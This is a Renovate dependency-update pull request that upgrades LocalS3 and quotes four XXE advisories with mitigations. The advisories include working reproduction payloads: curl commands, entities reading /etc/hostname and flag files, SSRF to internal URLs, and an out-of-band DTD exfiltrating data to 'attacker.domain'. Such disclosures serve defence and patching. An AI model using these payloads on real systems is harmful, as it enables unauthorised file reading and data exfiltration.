Conversation

renovate[bot]

@renovate renovate bot commented Mar 10, 2025

This PR contains the following updates:

Package: io.github.robothy:local-s3-rest
Change:  1.10 -> 1.21

GitHub Vulnerability Alerts

CVE-2025-27136

Description

The LocalS3 service's bucket creation endpoint is vulnerable to XML External Entity (XXE) injection. When processing the CreateBucketConfiguration XML document during bucket creation, the service's XML parser is configured to resolve external entities. This allows an attacker to declare an external entity that references an internal URL, which the server will then attempt to fetch when parsing the XML.

The vulnerability specifically occurs in the location constraint processing, where the XML parser resolves external entities without proper validation or restrictions. When the external entity is resolved, the server makes an HTTP request to the specified URL and includes the response content in the parsed XML document.

This vulnerability can be exploited to perform server-side request forgery (SSRF) attacks, allowing an attacker to make requests to internal services or resources that should not be accessible from external networks. The server will include the responses from these internal requests in the resulting bucket configuration, effectively leaking sensitive information.

Steps to Reproduce

  1. Create an XML document that includes an external entity declaration pointing to the internal target:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://internal-web/flag.txt"> ]>
    <CreateBucketConfiguration>
        <LocationConstraint>&xxe;</LocationConstraint>
    </CreateBucketConfiguration>

  2. Send a PUT request to create a new bucket with this configuration:

    curl -X PUT http://app/test-bucket-2 -H 'Content-Type: application/xml' -d @payload.xml

  3. Retrieve the bucket location to see the resolved entity content:

    curl http://app/test-bucket-2/?location

When these steps are executed, the server processes the XML, resolves the external entity by making a request to the internal URL, and includes the response in the bucket's location constraint. The attacker can then retrieve this information through the bucket location endpoint.

Mitigations

  • Disable XML external entity resolution in the XML parser configuration. Most XML parsers have options to disable external entity processing.
  • Implement proper input validation for XML documents, rejecting those that contain DOCTYPE declarations or external entity references.
  • Use XML parsers that are configured securely by default and don't process external entities.
  • If external entity processing is required, implement a whitelist of allowed URLs and validate all URLs before making any requests.

Impact

The vulnerability allows unauthenticated attackers to make the server perform HTTP requests to internal networks and services, potentially exposing sensitive information or enabling further attacks against internal systems. The attacker only needs to be able to send HTTP requests to the LocalS3 service to exploit this vulnerability.

GHSA-2466-4485-4pxj

Description

The LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server's filesystem.

The vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.

This type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.

Steps to Reproduce

  1. Create a test bucket using a PUT request to http://[server]/[bucket-name]

    curl -X PUT "http://app/xxe-test-bucket2"

  2. Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload:

    curl -X PUT "http://app/xxe-test-bucket2?acl" \
    -H "Content-Type: application/xml" \
    -d '<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE AccessControlPolicy [
        <!ENTITY xxe SYSTEM "file:///etc/hostname" >
    ]>
    <AccessControlPolicy>
        <Owner>
            <ID>&xxe;</ID>
            <DisplayName>test</DisplayName>
        </Owner>
        <AccessControlList>
            <Grant>
                <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
                    <ID>test</ID>
                    <DisplayName>test</DisplayName>
                </Grantee>
                <Permission>FULL_CONTROL</Permission>
            </Grant>
        </AccessControlList>
    </AccessControlPolicy>'
    
  3. Send a GET request to http://[server]/[bucket-name]?acl to retrieve the bucket ACL

    curl "http://app/xxe-test-bucket2?acl"
    

After performing these steps, the content of the target file (/etc/hostname in the payload above) will be included in the response within the ID field of the Owner element.

Mitigations

  • Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true
  • Disable DOCTYPE declarations in the XML parser configuration
  • Implement XML input validation and sanitization before processing
  • Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary

Impact

The vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server's filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.

GHSA-v232-254c-m6p7

Description

The LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.

When processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server's filesystem by defining an external entity that references local files.

The vulnerability is particularly severe because it allows direct access to sensitive files on the server's filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.

Steps to Reproduce

  1. Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)

  2. Send a PUT request to the bucket tagging endpoint with the following XML payload (saved as xxe.xml):

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE data [
        <!ENTITY xxe SYSTEM "file:///flag.txt" >
    ]>
    <Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>

    curl -X PUT \
         -H "Host: app" \
         -H "Authorization: AWS dummy:dummy" \
         -H "Content-Type: application/xml" \
         --data-binary @xxe.xml \
         http://app/bucket?tagging

  3. Retrieve the bucket tags using a GET request to the same endpoint

    curl -H "Authorization: AWS dummy:dummy" http://app-1/bucket?tagging
    
  4. The content of the targeted file will be returned in the tag value

The successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server's filesystem.

Mitigations

  • Disable XML external entity resolution in the XML parser configuration
  • Implement proper XML parsing security controls such as disabling DTD processing altogether
  • Use a safe parser configuration that doesn't process external entities or DTDs by default
  • Validate and sanitize all XML input before processing to prevent injection of malicious entities

Impact

Critical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server's filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.

GHSA-47qw-ccjm-9c2c

Description

The LocalS3 project, which implements an S3-compatible storage interface, contains a critical XML External Entity (XXE) Injection vulnerability in its XML parsing functionality. When processing XML requests for multipart upload operations, the application accepts and processes XML external entities, allowing an attacker to read local system files and potentially make outbound network connections.

The vulnerability exists because the XML parser is configured to process external entities and DTD (Document Type Definition) declarations without proper restrictions. This allows an attacker to define external entities that can read local files and exfiltrate their contents through outbound HTTP requests.

The vulnerability is particularly severe as it allows direct access to sensitive files on the filesystem, bypassing any directory traversal protections that might be in place for normal S3 operations.

Steps to Reproduce

  1. Create a malicious DTD file containing the following content:

    <!ENTITY % file SYSTEM "file:///etc/hostname">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.domain/?flag=%file;'>">
    %eval;
    %exfil;

  2. Host the malicious DTD file on an accessible web server

  3. Initialize a multipart upload to the LocalS3 server:

    curl -X PUT "http://app/test-bucket/test.txt?uploads"

  4. Send a POST request to complete the multipart upload with the following XML payload:

    curl -X POST "http://app/test-bucket/test.txt?uploadId=[upload-id]" \
    -H "Content-Type: application/xml" \
    -d '<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE data [
    <!ENTITY % dtd SYSTEM "http://attacker.domain/evil.dtd">
    %dtd;
    ]>
    <CompleteMultipartUpload>
       <Part>
           <PartNumber>1</PartNumber>
           <ETag>test</ETag>
       </Part>
    </CompleteMultipartUpload>'


The server will process the XML, load the external DTD, and when evaluating the entities, will read the contents of /etc/hostname and send them to the attacker's server via an HTTP request.

Mitigations

  • Disable DTD processing in the XML parser configuration
  • If DTD processing is required, disable the ability to load external entities and external DTDs
  • Implement XML parsing with secure defaults using JAXP's XMLConstants.FEATURE_SECURE_PROCESSING feature
  • Set up proper input validation and sanitization for all XML processing operations
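The mitigations listed for all four advisories come down to the same parser configuration. The following is an added example of that configuration in JAXP (not LocalS3's own code; the class and method names are hypothetical): it enables FEATURE_SECURE_PROCESSING, rejects any DOCTYPE, and turns off external general and parameter entities, so none of the payload shapes shown above (inline SYSTEM entities, or an external DTD pulled in through a parameter entity) can be resolved.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class HardenedS3XmlParser {  // hypothetical name, not a LocalS3 class

    /** Builds a DocumentBuilder that rejects DOCTYPEs and never resolves external entities. */
    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // JAXP secure processing: entity-expansion limits and related safeguards.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // No S3 request body needs a DTD, so reject DOCTYPE outright. This alone stops
        // inline SYSTEM entities and parameter-entity loading of an external DTD.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a parser implementation ignores the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses a body such as CreateBucketConfiguration or Tagging; null means rejected. */
    static Document parseRequestBody(String xml) throws ParserConfigurationException {
        try {
            return newHardenedBuilder().parse(new InputSource(new StringReader(xml)));
        } catch (SAXException | IOException e) {
            // DOCTYPE present or malformed body: the caller should answer 400 MalformedXML.
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample bodies: a normal one and one that carries a DOCTYPE.
        String benign = "<CreateBucketConfiguration><LocationConstraint>us-east-1"
                + "</LocationConstraint></CreateBucketConfiguration>";
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE t [<!ENTITY x \"inline\">]>"
                + "<Tagging><TagSet><Tag><Key>k</Key><Value>&x;</Value></Tag></TagSet></Tagging>";
        System.out.println("benign body accepted:  " + (parseRequestBody(benign) != null));
        System.out.println("DOCTYPE body rejected: " + (parseRequestBody(withDoctype) == null));
    }
}
```

Rejecting DOCTYPE is deliberately stricter than only disabling external entities: it also removes the entity-expansion denial-of-service vector that GHSA-2466-4485-4pxj mentions, and with disallow-doctype-decl set the parser raises a SAXParseException before any entity is looked at.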

Impact

An attacker can exploit this vulnerability to read arbitrary files from the server's filesystem and exfiltrate their contents through outbound HTTP requests. The vulnerability requires no authentication and can be exploited by anyone who can send requests to the LocalS3 server. This could lead to exposure of sensitive information including configuration files, credentials, and other confidential data stored on the server.


Release Notes

Robothy/local-s3 (io.github.robothy:local-s3-rest)

v1.21
  Full Changelog: Robothy/local-s3@1.20...1.21

v1.20
  Full Changelog: Robothy/local-s3@1.19...1.20

v1.19
  Full Changelog: Robothy/local-s3@1.18...1.19

v1.18

v1.17
  • support user-defined metadata in CreateMultipartUpload operation. by @Robothy in #100
  Full Changelog: Robothy/local-s3@1.16...1.17

v1.16
  Full Changelog: Robothy/local-s3@1.15...1.16

v1.15
  Full Changelog: Robothy/local-s3@1.14...1.15

v1.14
  Full Changelog: Robothy/local-s3@1.13...1.14

v1.13
  Full Changelog: Robothy/local-s3@1.12...1.13

v1.12.2
  Full Changelog: Robothy/local-s3@1.12.1...1.12.2

v1.12.1
  Full Changelog: Robothy/local-s3@1.12...1.12.1

v1.12
  Full Changelog: Robothy/local-s3@1.11...1.12

v1.11
  Full Changelog: Robothy/local-s3@1.10...1.11


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.

renovate bot force-pushed the renovate/maven-io.github.robothy-local-s3-rest-vulnerability branch from 1e235d4 to d7d6d9c on March 11, 2025 07:41
renovate bot force-pushed the renovate/maven-io.github.robothy-local-s3-rest-vulnerability branch 2 times, most recently from 0ce1695 to a3b0f0e on April 2, 2025 12:46
renovate bot force-pushed the renovate/maven-io.github.robothy-local-s3-rest-vulnerability branch 2 times, most recently from f8c12f1 to 9c2daa9 on May 27, 2025 10:03
renovate bot force-pushed the renovate/maven-io.github.robothy-local-s3-rest-vulnerability branch from 9c2daa9 to fc7f7ce on July 28, 2025 13:22
renovate bot force-pushed the renovate/maven-io.github.robothy-local-s3-rest-vulnerability branch from fc7f7ce to 6611617 on September 2, 2025 09:44
renovate bot force-pushed the renovate/maven-io.github.robothy-local-s3-rest-vulnerability branch from 6611617 to 1496635 on October 2, 2025 15:00